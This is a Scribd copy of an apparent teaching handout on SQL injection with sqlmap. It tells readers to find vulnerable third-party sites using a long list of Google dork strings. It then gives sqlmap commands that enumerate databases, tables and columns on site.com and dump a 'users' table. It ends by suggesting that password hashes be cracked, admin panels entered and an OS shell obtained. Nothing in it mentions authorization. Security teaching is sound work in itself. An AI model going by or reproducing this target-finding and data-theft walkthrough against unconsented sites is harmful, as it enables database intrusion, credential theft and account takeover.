Scribd
Upload
42 views

Topic 6b - Web Application SQL Injection Testing - Using Sqmap

Sqlmap is a Python tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Given a URL, it can find database names, tables, columns, extract data, and even get remote code execution under certain conditions by exploiting SQL injection vulnerabilities.

Uploaded by

rojaluteshi28
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
42 views

Topic 6b - Web Application SQL Injection Testing - Using Sqmap

Sqlmap is a Python tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. Given a URL, it can find database names, tables, columns, extract data, and even get remote code execution under certain conditions by exploiting SQL injection vulnerabilities.

Uploaded by

rojaluteshi28
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Hacking Web Applications: Sql injection using Sqlmap

Sqlmap
 Sqlmap is one of the most popular and powerful sql injection automation tool out
there.
 Given a vulnerable http request url, sqlmap can exploit the remote database and do
a lot of hacking like extracting database names, tables, columns, all the data
in the tables etc.
 It can even read and write files on the remote file system under certain
conditions.
 Written in python it is one of the most powerful hacking tools out there.
 Sqlmap is the metasploit of sql injections.

 Sqlmap is included in pen testing linux tools like kali linux, backtrack,
backbox etc.

 On other operating systems, it can be simply downloaded from the following url
http://sqlmap.org/.

 Since its written in python, first you have to install python on your system if using
Windows

Step 1: Find a Vulnerable Website


 This is usually the toughest bit and takes longer than any other steps.
 Those who know how to use Google Dorks knows this already, but in case you
don’t I have put together a number of strings that you can search in Google.
 Just copy paste any of the lines in Google and Google will show you a number of
search results.

1|Page
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable
website
Examples

Google Dork string Column Google Dork string Google Dork string Column
1 Column 2 3

inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id=

inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id=

2|Page
inurl:trainers.php?id= inurl:curriculum.php?id= inurl:rub.php?idr=

inurl:news-full.php?id= inurl:labels.php?id= inurl:view_faq.php?id=

inurl:news_display.php?getid= inurl:story.php?id= inurl:artikelinfo.php?id=

inurl:index2.php?option= inurl:look.php?ID= inurl:detail.php?ID=

inurl:readnews.php?id= inurl:newsone.php?id= inurl:index.php?=

inurl:top10.php?cat= inurl:aboutbook.php?id= inurl:profile_view.php?id=

inurl:newsone.php?id= inurl:material.php?id= inurl:category.php?id=

inurl:event.php?id= inurl:opinions.php?id= inurl:publications.php?id=

inurl:product-item.php?id= inurl:announce.php?id= inurl:fellows.php?id=

inurl:sql.php?id= inurl:rub.php?idr= inurl:downloads_info.php?id=

inurl:index.php?catid= inurl:galeri_info.php?l= inurl:prod_info.php?id=

inurl:news.php?catid= inurl:tekst.php?idt= inurl:shop.php?do=part&id=

3|Page
inurl:index.php?id= inurl:newscat.php?id= inurl:productinfo.php?id=

inurl:newsticker_info.php
inurl:news.php?id= inurl:collectionitem.php?id=
?idn=

inurl:index.php?id= inurl:rubrika.php?idr= inurl:band_info.php?id=

inurl:trainers.php?id= inurl:rubp.php?idr= inurl:product.php?id=

inurl:buy.php?category= inurl:offer.php?idf= inurl:releases.php?id=

inurl:article.php?ID= inurl:art.php?idm= inurl:ray.php?id=

inurl:play_old.php?id= inurl:title.php?id= inurl:produit.php?id=

inurl:declaration_more.php?de
inurl:news_view.php?id= inurl:pop.php?id=
cl_id=

inurl:select_biblio.php?id
inurl:pageid= inurl:shopping.php?id=
=

inurl:games.php?id= inurl:humor.php?id= inurl:productdetail.php?id=

inurl:page.php?file= inurl:aboutbook.php?id= inurl:post.php?id=

4|Page
inurl:ogl_inet.php?ogl_id
inurl:newsDetail.php?id= inurl:viewshowdetail.php?id=
=

inurl:fiche_spectacle.php?
inurl:gallery.php?id= inurl:clubpage.php?id=
id=

inurl:communique_detail.
inurl:article.php?id= inurl:memberInfo.php?id=
php?id=

inurl:show.php?id= inurl:sem.php3?id= inurl:section.php?id=

inurl:staff_id= inurl:kategorie.php4?id= inurl:theme.php?id=

inurl:newsitem.php?num= inurl:news.php?id= inurl:page.php?id=

inurl:shredder-
inurl:readnews.php?id= inurl:index.php?id=
categories.php?id=

inurl:top10.php?cat= inurl:faq2.php?id= inurl:tradeCategory.php?id=

inurl:product_ranges_view.php?
inurl:historialeer.php?num= inurl:show_an.php?id=
ID=

inurl:reagir.php?num= inurl:preview.php?id= inurl:shop_category.php?id=

5|Page
inurl:Stray-Questions-
inurl:loadpsb.php?id= inurl:transcript.php?id=
View.php?num=

inurl:forum_bds.php?num= inurl:opinions.php?id= inurl:channel_id=

inurl:game.php?id= inurl:spr.php?id= inurl:aboutbook.php?id=

inurl:view_product.php?id= inurl:pages.php?id= inurl:preview.php?id=

inurl:newsone.php?id= inurl:announce.php?id= inurl:loadpsb.php?id=

inurl:sw_comment.php?id= inurl:clanek.php4?id= inurl:pages.php?id=

inurl:news.php?id= inurl:participant.php?id=

inurl:avd_start.php?avd= inurl:download.php?id=

inurl:event.php?id= inurl:main.php?id=

inurl:product-item.php?id= inurl:review.php?id=

inurl:sql.php?id= inurl:chappies.php?id=

6|Page
inurl:material.php?id= inurl:read.php?id=

inurl:clanek.php4?id= inurl:prod_detail.php?id=

inurl:announce.php?id= inurl:viewphoto.php?id=

inurl:chappies.php?id= inurl:article.php?id=

inurl:read.php?id= inurl:person.php?id=

inurl:viewapp.php?id= inurl:productinfo.php?id=

inurl:viewphoto.php?id= inurl:showimg.php?id=

inurl:rub.php?idr= inurl:view.php?id=

inurl:galeri_info.php?l= inurl:website.php?id=

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable
the next step is to find out the names of the databases that exist on the remote
system.

The "--dbs" option is used to get the database list.


7|Page
The output shows the existing databases on the remote system.

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the
database of interest over here is 'safecosmetics'

Command

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns
of some important table.

Lets say the table is 'users' and it contains the username and password.

8|Page
$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users

Get data from a table

Now comes the most interesting part, of extracting the data from the table.

The command would be

$ python sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users

9|Page
The above command will simply dump the data of the particular table, very much like
the mysqldump command.
The output might look similar to this

 The hash column seems to have the password hash. Try cracking the hash and then you
would get the login details rightaway.
 sqlmap will create a csv file containing the dump data for easy analysis.
 So far we have been able to collect a lot of information from the remote database using
sqlmap
 Its almost like having direct access to remote database through a client like
phpmyadmin.
 In real scenarios hackers would try to gain a higher level to access to the system.
 For this, they would try to crack the password hashes and try to login through the admin
panel. Or they would try to get an os shell using sqlmap.

10 | P a g e

You might also like